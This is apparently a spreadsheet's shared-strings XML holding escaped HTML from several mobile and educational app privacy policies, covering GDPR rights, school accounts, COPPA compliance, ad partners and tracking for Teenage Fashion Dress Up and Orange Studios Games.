    <t>NOTICE&lt;/h3&gt;&lt;p&gt;We respect your privacy rights and provide you with reasonable access and rights to the Personal Data (as this term is referred to for individuals located in the countries of the EU, UK or Switzerland pursuant to the European Directives 95/46/EC and 2002/58/EC (EU General Data Protection Regulations Legislation, also known as GDPR)) that you may have provided through your use of the Products. If you live in the European Economic Area (EEA), and wish to access, amend, delete, or transfer any Personal Data we hold about you, you may contact us as set forth in the “Who We Are. Contact Us” section below.&lt;/p&gt;&lt;p&gt;You may update, correct, or delete your Personal Data and preferences at any time by request to us at the email below.</t>
  </si>
  <si>
    <t>Please note that while any changes you make will be reflected in active user databases instantly or within a reasonable period of time, we may retain all information you submit for backups, archiving, prevention of fraud and abuse, analytics, satisfaction of legal obligations, or where we otherwise reasonably believe that we have a legitimate reason to do so.&lt;/p&gt;&lt;p&gt;You may decline to share certain Personal Data with us, in which case we may not be able to provide to you some of the features and functionality of the Services.&lt;/p&gt;&lt;p&gt; At any time, you may object to the processing of your Personal Data, on legitimate grounds, except if otherwise permitted by applicable law. If you believe your right to privacy granted by applicable data protection laws has been infringed upon, please contact us at the email below.</t>
  </si>
  <si>
    <t>You also have a right to lodge a complaint with data protection authorities.&lt;/p&gt;&lt;h3&gt;INTERNATIONAL TRANSFERS&lt;/h3&gt;&lt;p&gt;Where we transfer your Personal Data outside the European Economic Area (EEA), we rely on approved standard EU Model Clauses so these transfers are conducted in accordance with applicable laws and using adequate and appropriate safeguards.&lt;/p&gt;&lt;p&gt;To find out more about how we safeguard your information (including obtaining a copy of such safeguards) in relation to transfers outside the EEA, please contact us via the details provided in the “Who We Are. Contact Us” section below.&lt;/p&gt;&lt;h3&gt;OPT OUTS; REMOVAL OF CONTENT.&lt;/h3&gt;&lt;p&gt;We permit all users to request an Opt out from receiving marketing emails, texts, or other marketing communications from us on a going-forward basis please submit a written request to the address below. In your request, please specify that “Opt Out Request.”</t>
  </si>
  <si>
    <t>We will try to comply with your opt-out request as soon as reasonably practicable. Please note that if you opt out as described above, this will apply to marketing messages from us only. We will not be able to remove your Personal Information from the database of any third parties to whom you have previously authorized us to share such information.</t>
  </si>
  <si>
    <t>Please also note that we may still send you important administrative messages, and you cannot opt-out from receiving administrative messages.&lt;/p&gt;&lt;p&gt; In addition, Adult Users may contact us at any time to request that we provide for their review, or delete from our records, any information they have provided about child/student users associated with their account.   This includes the ability to request that we discontinue any further collection or use of their child/student’s information.&lt;/p&gt;&lt;p&gt;If you would like us to remove publicly visible content posted by you, please send an email with the words “Content Removal” in the subject line to &lt;a href="mailto:privacy@codespark.com"&gt;privacy@codespark.com&lt;/a&gt; and include a description of the content and its location.&lt;/p&gt;&lt;p&gt;If we delete content, please note: (1) there might be some latency in deleting this information from our servers and back-up storage; and (2) we may retain this information if necessary to comply with our legal obligations, resolve disputes, or enforcement of our agreements.&lt;/p&gt;&lt;h3&gt;GENERAL &amp;amp; DATA SECURITY&lt;/h3&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>The security of your personal information is important to us, and we employ physical, technical, and administrative security measures designed to safeguard the information collected by the Services. We use industry standard SSL (secure socket layer technology) encryption to transfer PII. Other security safeguards include, but are not limited to, data encryption, firewalls, and physical access controls to buildings and files.&lt;/p&gt;&lt;p&gt;Account holders create a password in the registration process.</t>
  </si>
  <si>
    <t>You can help protect against unauthorized access to your Account and PII by selecting and protecting your password appropriately and limiting access to your computer and browser by signing off after you have finished accessing your Account.&lt;/p&gt;&lt;h3&gt;&lt;u&gt;SCHOOL ACCOUNTS&lt;/u&gt;&lt;/h3&gt;&lt;p&gt; We are committed to maintaining the security and confidentiality of your and your children’s information, including, but not limited to, any student data, which we receive through School Accounts. Some of the precautions we take include (a) limiting access to student data; (b) requiring employees to sign confidentiality agreements upon hiring; (c) conducting employee privacy and data security training and education; and (d) protecting information with commercially reasonable technical, contractual, administrative, and physical security safeguards.&lt;/p&gt;&lt;p&gt;Please be aware that no data transmission over the Internet can be guaranteed to be 100% secure.</t>
  </si>
  <si>
    <t>As a result, we cannot guarantee or warrant the security of any information you transmit on or through the Services and you do so at your own risk. All Information, including your personally identifiable information, may be maintained on servers or databases located outside your state or country or to a jurisdiction where the privacy laws may not be as protective as those in your location.&lt;/p&gt;&lt;p&gt;If you are located outside of the United States, please be advised that we process and store information in the United States and your use of our Services constitutes your consent to and understanding of this processing.&lt;/p&gt;&lt;h3&gt;CHANGES TO THIS POLICY: GENERAL&lt;/h3&gt;&lt;p&gt;We reserve the right to change this Privacy Policy at any time, and will do so by posting changes to this Privacy Policy on the Site.   If we make material changes to our handling of personally identifiable information previously collected from you, we may notify you more prominently and obtain your prior consent, including parental consent where necessary.&lt;/p&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>This Privacy Policy shall be governed by and construed in accordance with the laws of the State of California applicable to agreements made and performed in California, excluding the application of the conflict of laws provisions. This Privacy Policy is subject to the Terms of Servic</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"/&gt;
&lt;/head&gt;
	&lt;body&gt;
		&lt;p&gt;&lt;em&gt;Last updated: 22 Nov 2022&lt;/em&gt;&lt;/p&gt;
		&lt;h1&gt; Teenage Fashion Dress Up - Privacy Policy&lt;/h1&gt;
		&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Data Access&lt;/b&gt;
	&lt;p&gt;
		We don't store your personal data like your email id, phone number or any other personal details on our servers. We are focused on offering the best products to users and not interested to use this data for marketing purpose or do anything like selling/sharing with other companies.
	</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;br&gt;They are:&lt;br&gt;&lt;br&gt;
		"Kidoz" (&lt;a href="https://kidoz.net/privacy-policies"&gt;Privacy Policy&lt;/a&gt;)&lt;br&gt;
		"Unity Ads" (&lt;a href="https://unity3d.com/legal/privacy-policy"&gt;Privacy Policy&lt;/a&gt;)&lt;br&gt;
		"Google Admob" (&lt;a href="https://privacy.google.com/businesses/controllerterms/"&gt;Privacy Policy&lt;/a&gt;)&lt;br&gt;
	&lt;/p&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Ad Compliance&lt;/b&gt;
	&lt;p&gt;	
		Our games show ads which are COPPA-compliant and GDPR-compliant (non-personalized) and suitable for general audiences.
	 &lt;/p&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Analytics&lt;/b&gt;
	&lt;p&gt;
		Analytics companies may access anonymous data (such as your IP address or device ID) to help us understand how our services are used. They share it with us in aggregate form; no data is shared as to any individual user.
		</t>
  </si>
  <si>
    <t xml:space="preserve">Our privacy policy may change from time to time. If we make any material changes to our policies, we will place a prominent notice on our website or application.
	 &lt;/p&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Contact Information&lt;/b&gt;
	&lt;p&gt;
		If you have any questions or concerns about our privacy policies, please send a mail to us on support at teenagefashiondressup@gmail.com
	&lt;/p&gt;
&lt;/p&gt;
	&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;_x005F_x000D_
&lt;html&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
&lt;title&gt;Privay Policy - Orange Studios Games&lt;/title&gt;_x005F_x000D_
&lt;meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"&gt;_x005F_x000D_
&lt;meta name="author" content="Orange Studios Games"&gt;_x005F_x000D_
&lt;meta name="generator" content="Web Page Maker"&gt;_x005F_x000D_
&lt;style type="text/css"&gt;_x005F_x000D_
/*----------Text Styles----------*/_x005F_x000D_
.ws6</t>
  </si>
  <si>
    <t>{font-size: 8px;}_x005F_x000D_
.ws7 {font-size: 9.3px;}_x005F_x000D_
.ws8 {font-size: 11px;}_x005F_x000D_
.ws9 {font-size: 12px;}_x005F_x000D_
.ws10 {font-size: 13px;}_x005F_x000D_
.ws11 {font-size: 15px;}_x005F_x000D_
.ws12</t>
  </si>
  <si>
    <t>{font-size: 16px;}_x005F_x000D_
.ws14 {font-size: 19px;}_x005F_x000D_
.ws16 {font-size: 21px;}_x005F_x000D_
.ws18</t>
  </si>
  <si>
    <t>{font-size: 24px;}_x005F_x000D_
.ws20 {font-size: 27px;}_x005F_x000D_
.ws22 {font-size: 29px;}_x005F_x000D_
.ws24 {font-size: 32px;}_x005F_x000D_
.ws26 {font-size: 35px;}_x005F_x000D_
.ws28 {font-size: 37px;}_x005F_x000D_
.ws36</t>
  </si>
  <si>
    <t xml:space="preserve">{font-size: 48px;}_x005F_x000D_
.ws48 {font-size: 64px;}_x005F_x000D_
.ws72 {font-size: 96px;}_x005F_x000D_
.wpmd {font-size: 13px;font-family: Arial,Helvetica,Sans-Serif;font-style: normal;font-weight: normal;}_x005F_x000D_
/*----------Para Styles----------*/_x005F_x000D_
DIV,UL,OL /* Left */_x005F_x000D_
{_x005F_x000D_
 margin-top: 0px;_x005F_x000D_
 margin-bottom: 0px;_x005F_x000D_
}_x005F_x000D_
&lt;/style&gt;_x005F_x000D_
_ x000D_
&lt;style type="text/css"&gt;_x005F_x000D_
a.menu:link{color:#FFFFFF;text-decoration: none;}_x005F_x000D_
a.menu:visited{color:#FFFFFF;text-decoration: none;}_x005F_x000D_
a.menu:hover{color:#FF6600;text-decoration: none;}_x005F_x000D_
a.menu:active{color:#FFFFFF;text-decoration: none;}_x005F_x000D_
</t>
  </si>
  <si>
    <t>a.get_it:link{color:#4B9436;text-decoration: none;}_x005F_x000D_
a.get_it:visited{text-decoration: none;}_x005F_x000D_
a.get_it:hover{text-decoration: none;}_x005F_x000D_
a.get_it:active{text-decoration: none;}_x005F_x000D_
a.lenguaje:link{color:#000000;text-decoration: none;}_x005F_x000D_
a.lenguaje:visited{text-decoration: none;}_x005F_x000D_
a.lenguaje:hover{color:#FFFFFF;text-decoration: none;}_x005F_x000D_
a.lenguaje:active{text-decoration: none;}_x005F_x000D_
a.style4:link{color:#0000FF;text-decoration: underline;}_x005F_x000D_
a.style4:visited{color:#0000FF;text-decoration: none;}_x005F_x000D_
a.style4:hover{color:#FF6600;text-decoration: underline;}_x005F_x000D_
a.style4:active{color:#0000FF;text-decoration: none;}_x005F_x000D_
&lt;/style&gt;_x005F_x000D_
_x005F_x000D_
&lt;style type="text/css"&gt;_x005F_x000D_
div#container_x005F_x000D_
{_x005F_x000D_
	position:relative;_x005F_x000D_
	width: 795px;_x005F_x000D_
	margin-top: 0px;_x005F_x000D_
	margin-left: auto;_x005F_x000D_
	margin-right: auto;_x005F_x000D_
	text-align:left; _x005F_x000D_
}_x005F_x000D_
body {text-align:center;margin:0}_x005F_x000D_
&lt;/style&gt;_x005F_x000D_
_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
&lt;body bgColor="#FFFFFF"&gt;_x005F_x000D_
&lt;div id="container"&gt;_x005F_x000D_
&lt;div id="text1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:795px; height:2617px; z-index:0"&gt;_x005F_x000D_
&lt;div class="wpmd"&gt;_x005F_x000D_
&lt;div align=center&gt;&lt;font class="ws14"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=center&gt;&lt;font class="ws18"&gt;&lt;B&gt;PRIVACY POLICY&lt;/B&gt;&lt;/font&gt;&lt;font class="ws18"&gt; &lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=center&gt;&lt;font class="ws12"&gt;ORANGE STUDIOS GAMES&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=center&gt;&lt;font class="ws12"&gt;(Last updated:&amp;nbsp; August 20, 2019)&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;OVERVIEW&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;We've done our best to cut through the legal jargon and explain in simple terms what information we collect, what we use it for, and the few situations in which we may share it with others. Please read this privacy policy carefully.</t>
  </si>
  <si>
    <t>It applies to all interactions you make with our games.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;THE INFORMATION WE COLLECT&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;We receive some information automatically when you use our Apps. This includes data about your device, software, operating system, the language you've set for your Device, advertising IDs for advertisement tracking ("Advertising IDs") and your IP address.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;In order to try to improve your experience with our games, occasionally we can collect information about how you interact with content and advertisements throughout the application.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;We do not collect personally identifiable information about you or your children through our apps.</t>
  </si>
  <si>
    <t>In other words, we do not collect information such as your name, address, phone number or email address.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;Occasionally we collect the personal information that you voluntarily provide to us (e.g. email addresses you give us when you submit a request to a support via our web or email).&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;Cookies&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;When you visit our website, occasionally we may send cookies to your computer that uniquely identify your browser. We use cookies to improve the quality of our service by storing user preferences and tracking usage information. Most browsers allow you to disable cookies or set your browser to alert you when cookies are being sent to your computer.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;Does</t>
  </si>
  <si>
    <t>ORANGE STUDIOS GAMES Collect My Financial Information When I Make In-App Purchases?&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;When you make in-app purchases in the our Games, we do not collect or have any access to your name and billing information.</t>
  </si>
  <si>
    <t>This information is collected and stored by your platform (Android's Google Play) or your platform's payment processor.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;Social media features and tools.&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;Our Games may include integrated social media features and tools, such as button "Share". Social media features and tools are hosted by a third-party, and your interactions with these integrated social media features and tools are governed by the privacy policy of the company providing it.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;CHILDREN'S PRIVACY&lt;/B&gt;&lt;/font&gt;&lt;br&gt;_x005F_x000D_
&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;Our products respect the privacy of children. We don't collect personal Information from children with our mobile applications.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;Our apps for children's do not show Interest-based Advertising.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;We comply with the Children's Online Privacy Protection Act (COPPA).&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;Our website and mobile applications comply with the Children's Online Privacy Protection Act ("COPPA").&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;In the event that a user identifies himself/herself as a child under the age of 13 through a support request or feedback, we will not collect, store or use and will delete in a secure manner any personal information of such a user.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#000000" class="ws12"&gt;We take care of filtering categories of sensitive and unsuitable ads for children.</t>
  </si>
  <si>
    <t>But rarely can an advertiser misclassify your ads, and this situation is beyond our reach.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;HOW WE USE AND DISCLOSE THE INFORMATION COLLECTED&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;We use the information collected to better understand how you use our Games, customize your experience (including the content, marketing materials, and advertisements you see), prevent abuse and improve the application.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;ORANGE STUDIOS GAMES works with the following partners to serve you third-party advertisements and develop our games:&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;- Google, LLC.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;- Corona Labs&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;For more information about our partners' practices, please visit the following links:&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;- &lt;/font&gt;&lt;font class="ws12"&gt;&lt;a href="https://www.google.com/policies/privacy/partners/" title="" target="_blank" class="style4"&gt;https://www.google.com/policies/privacy/partners/&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;- &lt;/font&gt;&lt;font class="ws12"&gt;&lt;a href="https://coronalabs.com/privacy-policy/" title="" target="_blank" class="style4"&gt;https://coronalabs.com/privacy-policy/&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;We may share the information collected only under these circumstances:&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;UL&gt;_x005F_x000D_
&lt;li&gt;&lt;font class="ws12"&gt;If we believe it's reasonably necessary to comply with a law, regulation or legal process.&lt;/font&gt;&lt;/li&gt;_x005F_x000D_
&lt;li&gt;&lt;font class="ws12"&gt;To third parties helping us offer and improve our service, such as those providing ORANGE STUDIOS GAMES certain technical tools and analytics services that help us understand how people use our games so we can make its better.&lt;/font&gt;&lt;/li&gt;_x005F_x000D_
&lt;li&gt;&lt;font class="ws12"&gt;If we sell, transfer or otherwise share some or all of our assets, including the information identified in this privacy policy, in connection with a merger, acquisition, reorganization or sale of assets in the event of a bankruptcy.&lt;/font&gt;&lt;/li&gt;_x005F_x000D_
&lt;/UL&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;We may disclose aggregate information about how users use our games, always in a manner that doesn't identify you individually.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;TRACKING POLICY&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;Ad companies may use and collect anonymous data about your interests to customize content and advertising here and in other sites and applications. Interest and location data may be linked to your device, but is not linked to your identity. Our Games may share your Advertising ID with advertising partners in an anonymous fashion that is not tied to your name or email address.</t>
  </si>
  <si>
    <t>&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;You can opt out by discontinuing your use our Games.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;HOW LONG DO WE KEEP THE INFORMATION&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;How long we store the information we collected will depend on the purpose that we originally collected it. We will not retain information for longer than is necessary for our business or for legal requirements.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;SUPPORT&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;Our users can send us an email if they need support or help with any of our products. If you submit a support request, we will receive your email address and possibly other personal and non-personal information that you provide related to your support request ("Support Information").</t>
  </si>
  <si>
    <t>We use Support Information only.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;CONTACT&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;We'd love to hear your questions, concerns and feedback about this privacy policy. If you have suggestions for us, let us know at: &lt;/font&gt;&lt;font class="ws12"&gt;&lt;a href="mailto:orangegstudios@gmail.com" title="" class="style4"&gt;orangegstudios@gmail.com&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;CHANGES TO THIS PRIVACY POLICY&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font color="#333399" class="ws12"&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;We may amend this Privacy Policy from time to time.</t>
  </si>
  <si>
    <t xml:space="preserve">Use of information we collect is subject to the Privacy Policy in effect at the time such information is collected. As a result, we encourage you to review this privacy statement periodically to track changes.&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;div align=justify&gt;&lt;font class="ws12"&gt;&lt;BR&gt;&lt;/font&gt;&lt;/div&gt;_x005F_x000D_
&lt;/div&gt;&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
&lt;/body&gt;_x005F_x000D_
&lt;/html&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
&lt;meta charset="UTF-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover" /&gt;
